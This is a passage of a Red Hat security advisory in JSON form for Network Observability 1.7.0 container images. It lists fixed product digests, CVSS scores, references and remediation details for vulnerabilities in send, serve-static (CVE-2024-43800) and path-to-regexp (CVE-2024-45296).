"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
